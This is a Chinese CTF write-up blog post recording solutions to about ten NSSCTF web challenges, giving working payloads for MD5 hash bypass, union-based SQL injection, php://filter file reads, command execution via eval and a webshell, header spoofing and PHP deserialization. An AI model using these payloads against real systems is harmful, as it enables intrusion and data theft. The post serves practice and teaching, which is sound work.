NSSCTFweb刷题记录

目录

[SWPUCTF 2021 新生赛]jicao

 [SWPUCTF 2021 新生赛]easy_md5

 [SWPUCTF 2021 新生赛]easy_sql

[SWPUCTF 2021 新生赛]include 

[SWPUCTF 2021 新生赛]easyrce 

[SWPUCTF 2021 新生赛]caidao

[第五空间 2021]WebFTP

 [SWPUCTF 2021 新生赛]babyrce

[SWPUCTF 2021 新生赛]Do_you_know_http

 [SWPUCTF 2021 新生赛]ez_unserialize

[SWPUCTF 2021 新生赛]jicao

如果$id等于"wllmNB"并且$json['x']等于"wllm",则将输出$flag的值。

json参数的值解码为{"x":"wllm"},从而使得$json['x']的值等于"wllm"。

通过POST方法传递的id参数的值,并将通过GET方法传递的json参数解码为关联数组

 [SWPUCTF 2021 新生赛]easy_md5

可以传MD5值为0e开头的两个不同字符串绕过,也可以传递数组绕过

https://www.cnblogs.com/dre0m1/p/16062369.html

第一种传入数组绕过构造name[]=1和password[]=2

第二种传MD5值为0e开头的两个不同字符串绕过

以下是$name != $password && md5($name) == md5($password)MD5相匹配的值 

QNKCDZO
240610708
s878926199a
s155964671a
s214587387a
s214587387a

 [SWPUCTF 2021 新生赛]easy_sql

SQL注入基础语句大全

https://blog.csdn.net/Jack0610/article/details/88056137https://blog.csdn.net/Jack0610/article/details/88056137

注入wllm=1'的时候出现报错,判断为字符型漏洞

查看一下字段列数,正常

?wllm=-1' order by 3--+

?wllm=-1' order by 4--+

出现报错,则为3列.

?wllm=-1' union select 1,2,3--+

查看回显

查看数据库名

?wllm=-1' union select 1,2,database()--+

 ?wllm=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='test_db'--+

查看test_tb库的表

查字段

?wllm=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='test_tb'--+ 

 

出现flag,查看flag内容

-1' union select 1,2,group_concat(id,flag) from test_tb--+ ​​​​​​​ 

[SWPUCTF 2021 新生赛]include 

PHP Filter伪协议Trick总结

先传入一个file=1,需要获取file参数则输出flag.php

构造filter伪协议,得到flag 

file=php://filter/read=convert.base64-encode/resource=flag.php

base64解码

[SWPUCTF 2021 新生赛]easyrce 

eval执行: PHP代码显示,要求将命令赋值给url然后执行

先查看一下根目录文件

url=system("ls")

url=system("ls /")

查看flllllaaaaaaggggggg文件

url=system("cat /flllllaaaaaaggggggg")

 cat /是查看根目录,cat flag是查看当前目录下面的flag 

[SWPUCTF 2021 新生赛]caidao

提示存在执行漏洞,post传入

wllm=echo `cat /flag`;

或者蚁剑连接,密码就是wllm

flag在根目录里面

[第五空间 2021]WebFTP

找到管理员账号密码(感觉并没有什么用)

 

在url后面直接加上phpinfo.php,直接找到flag

 [SWPUCTF 2021 新生赛]babyrce

审计代码,设置cookie为admin=1则得到../next.php

访问rasalghul.php

构造

url=ls${IFS}/

?url=cat${IFS}/flllllaaaaaaggggggg

 

[SWPUCTF 2021 新生赛]Do_you_know_http

将User-Agent修改为WLLM

提示使用本地登录

加一句IP请求头

x-forwarded-for:127.0.0.1

 访问secretttt.php,得到flag

 [SWPUCTF 2021 新生赛]ez_unserialize

提示查看robot.txt文件

访问/c145s.php,得到源码,如果admin=admin,passwd=ctf则得到flag.php

 构造反序列化漏洞:反序列化漏洞

p=O:4:"wllm":2:{s:5:"admin";s:5:"admin";s:6:"passwd";s:3:"ctf";}

O:4:"wllm":2: 表示这是一个类为 "wllm" 的对象,其中 "wllm" 类名的长度为 4。 s:5:"admin"; 表示键名为 "admin" 的字符串,长度为 5,对应的值是 "admin"。 s:6:"passwd"; 表示键名为 "passwd" 的字符串,长度为 6,对应的值是 "ctf"

 得到flag

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值